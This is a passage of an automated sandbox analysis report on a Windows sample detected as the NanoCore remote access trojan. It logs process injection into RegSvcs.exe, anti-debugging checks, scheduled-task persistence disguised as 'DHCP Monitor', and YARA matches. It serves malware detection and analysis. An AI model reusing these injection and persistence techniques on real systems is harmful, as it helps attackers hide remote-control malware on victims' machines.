    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,10_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0118DE7C FindFirstFileW,FindClose,10_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,20_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01182408 FindFirstFileW,LdrInitializeThunk,Sleep,FindNextFileW,FindClose,20_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,20_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,20_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0118DE7C FindFirstFileW,FindClose,20_2_0118DE7C
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113EE30 LoadLibraryA,GetProcAddress,4_2_0113EE30
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00216AF3 mov eax, dword ptr fs:[00000030h]0_2_00216AF3
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020E4F5
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0021ACA1 GetProcessHeap,0_2_0021ACA1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01146374 GetStartupInfoW,__heap_init,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,__wwincmdln,LdrInitializeThunk,4_2_01146374
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118A35D BlockInput,4_2_0118A35D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E643 SetUnhandledExceptionFilter,0_2_0020E643
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020E4F5
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0020E7FB
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_00217BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00217BE1
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114F170 SetUnhandledExceptionFilter,4_2_0114F170
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0114A128
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01147CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_01147CCD
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0114A128
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_0114F170 SetUnhandledExceptionFilter,10_2_0114F170
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01147CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_01147CCD
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0114A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0114A128
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01147CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_01147CCD

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Allocates memory in foreign processesShow sources
    Source: C:\Users\user\77066510\cjlaro.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F60000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processesShow sources
    Source: C:\Users\user\77066510\cjlaro.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F60000 value starts with: 4D5AJump to behavior
    Writes to foreign memory regionsShow sources
    Source: C:\Users\user\77066510\cjlaro.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 361000Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F60000Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DFA000Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_011643FF
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnrJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'Jump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnrJump to behavior
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01166C61 LogonUserW,4_2_01166C61
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0113D7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,4_2_0113D7A0
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01163321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,4_2_01163321
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0117602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_0117602A
    Source: RegSvcs.exe, 00000005.00000002.558858060.0000000002EBB000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.375222511.0000000003936000.00000004.00000001.sdmpBinary or memory string: Program Manager
    Source: cjlaro.pifBinary or memory string: Shell_TrayWnd
    Source: RegSvcs.exe, 00000005.00000002.557519174.0000000001420000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: cjlaro.pif, 00000004.00000003.320782139.0000000004CE3000.00000004.00000001.sdmp, cjlaro.pif, 00000014.00000003.374937841.0000000003921000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
    Source: cjlaro.pif, 00000004.00000003.320833602.0000000004CFF000.00000004.00000001.sdmpBinary or memory string: Program ManagerP7
    Source: RegSvcs.exe, 00000005.00000002.557519174.0000000001420000.00000002.00020000.sdmpBinary or memory string: Progmanlock
    Source: RegSvcs.exe, 00000005.00000002.558858060.0000000002EBB000.00000004.00000001.sdmpBinary or memory string: Program Manager\2A
    Source: cjlaro.pif, 00000004.00000000.305322925.00000000011B2000.00000002.00020000.sdmp, cjlaro.pif, 0000000A.00000002.337116003.00000000011B2000.00000002.00020000.sdmp, cjlaro.pif, 00000014.00000000.348690315.00000000011B2000.00000002.00020000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then}
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00209D99
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E34B cpuid 0_2_0020E34B
    Source: C:\Users\user\77066510\cjlaro.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0020CBB8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_0114E284
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A2BF9 GetUserNameW,4_2_011A2BF9
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FA995 GetVersionExW,0_2_001FA995

    Stealing of Sensitive Information:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391670186.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391832360.0000000004419000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Source: cjlaro.pifBinary or memory string: WIN_XP
    Source: cjlaro.pifBinary or memory string: WIN_XPe
    Source: cjlaro.pifBinary or memory string: WIN_VISTA
    Source: cjlaro.pif, 00000014.00000000.348690315.00000000011B2000.00000002.00020000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
    Source: cjlaro.pifBinary or memory string: WIN_7
    Source: cjlaro.pifBinary or memory string: WIN_8

    Remote Access Functionality:

    barindex
    Detected Nanocore RatShow sources
    Source: cjlaro.pif, 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: RegSvcs.exe, 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
